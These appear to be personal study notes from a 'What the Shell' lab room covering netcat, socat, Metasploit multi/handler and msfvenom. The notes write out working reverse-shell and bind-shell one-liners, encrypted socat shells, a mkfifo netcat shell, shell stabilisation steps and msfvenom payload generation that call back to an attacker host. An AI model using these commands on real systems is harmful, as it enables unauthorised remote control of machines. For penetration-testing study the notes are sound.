What the Shell
Tools
- variety of tool that can be used to recieve reverse shells
- netcat
- basic tasks like banner grabbing
- but also recieve reverse shells and connect to remote ports attached to bind shells
- very unstable, easy to loose by default, can be improved
- socat
- more features than netcat
- usually more stable than netcat by default
- more difficult syntax, socat rarely installed
- metaploit multi/handler
exploit/multi/handlermodule in metasploit- fully fledged way to obtain stable shells with wide variety of options
- only way to interact with meterpreter shell
- easiest way to handle staged payloads
- msfvenom
- shipped as standalone, but part of metasploit
- can generate payloads on the fly
- others
Types of Shell
Reverse Shell
- target is forced to execute code that connects back to your computer
- need to use tools on own computer to setup listened to recieve connection
- good way to bypass firewall rules, but need to configure own network to accept connection
Bind Shell
- code executed on target starts listened attached to shell directly on target
- opened up to internet, can connect to that port and execute code
- does not require configuration of own network, but may be blocked by target firewall
Netcat
- reverse shells
- listener
nc -lvnp <port>-llistening,-vverbose output,-ndont resolve hostname or dns,-pport to listen- have to use sudo when choosing port below 1024, but well known ports make it more likely to get around firewall
- listener
- bind shells
- connect to to listener on target
nc <target ip> <port on target>
Netcat Shell Stabilisation
python
- linux only, since python almost always installed by default
# use python to spawn better featured bash shell
python -c 'import pty;pty.spawn("/bin/bash")'
# gives access to commands like clear
export TERM=xterm
# background the shell using ctrl z
# in own terminal
stty raw -echo; fg # turns off own terminal echo, foregrounds target shell to enable tab and everything else
# if target shell dies, no output in own terminal, do reset to fix
rlwrap
- gives access to history, tab completion and arrow keys upon recieving shell
- much more useful on windows
- to use, call
rlwrap nc -lvnp <port>
socat
- limited to linux targets, no more stable than netcat on windows targets
- requires transfer of socat static compiled binary to target
- webserver on attack machine, e.g.
sudo python -m http.server 80 - start webserver on attack machine, wget binary on target
Change Terminal TTY Size
# open another terminal and run
stty -a
# note down rows and columns
# in reverse/bind shell type
stty rows <rows>
stty cols <cols>
Socat
- connector between two points
Reverse Shell
# basic reverse shell listener
socat TCP-L:<port> -
# result is unstable shell
# on windows, use this to connect back
# pipes used to force powershell to use unix style standard input and output
socat TCP:<local ip>:<local port> EXEC:powershell.exe,pipes
# on linux
socal TCP:<local ip>:<local port> EXEC:"bash -li"
Bind Shell
# listener on linux
socat TCP-L:<local port> EXEC:"bash -li"
# listener on windows
socat TCP-L:<local port> EXEC:powershell.exe,pipes
# on attack machine
socat TCP:<target ip>:<target port> -
Fully Stable Linux TTY Reverse Shell
- only works on linux targets
- very stable
# listener
socat TCP-L:<port> FILE:`tty`,raw,echo=0 # connecting two points, listening port and a file, current tty as a file and setting echo to be zero
# other special listener, target must have socat installed
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
# linking up listener with attack machine, create interactive bach session, allocate pseudoterminal, show error messages in shell, pass ctrl c to subprocess, create new process in new session, stabilise terminal by "normalising" it
Socat Encrypted Shells
# first need to create certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# creates 2048 bit rsa key with matching cert file, questions can be filled in or left blank
# merge cert and key file into .pem file
cat shell.key shell.crt > shell.pem
# when setting up reverse shell use
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 -
# uses generated certificate, verify=0 means dont validate
# to connect back
socat OPENSSL:<local ip>:<local port>,verify=0 EXEC:/bin/bash
# same applies to bind shell
# target machine
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
# attack machine
socat OPENSSL:<target ip>:<target port>,verify=0 -
Common Shell Payloads
- some versions of netcat have
-eoption, to start a process on connection nc -lvnp <port> -e /bin/bashexecutes bind shell on connection- mostly only works on windows, linux requires this to code to create listener for bind shell
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
msfvenom
Standard syntax
msfvenom -p <payload> <options>
Example to generate windows x64 reverse shell in exe format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
- staged
- sent in two parts
- stager
- executed directly on server itself
- connects back to waiting listener
- doesnt actually contain any reverse shell code
- connects to listener to to load real payload, executing it directly and preventing it from touching the disk
- requires special listener
- stageless
- more common
- entirely self contained
- immediately sends shell back to waiting listener upon execution
Payload Naming Conections
<OS>/<arch>/<payload>_e.g.shell_reverse_tcpmeans its a stageless payloadshell/reverse_tcois staged payload equivalent, denoted with forward slash/
Metasploit multi/handler
- open
mfsconsole use multi/handler
- need to set three options
- payload
set PAYLOAD <payload> - LHOST
set LHOST <listen address>on which address to listen - LPORT
set LPORT <listen port>on which port to listen
- payload
- when everything is set, run exploit using
exploit -j, to run job in background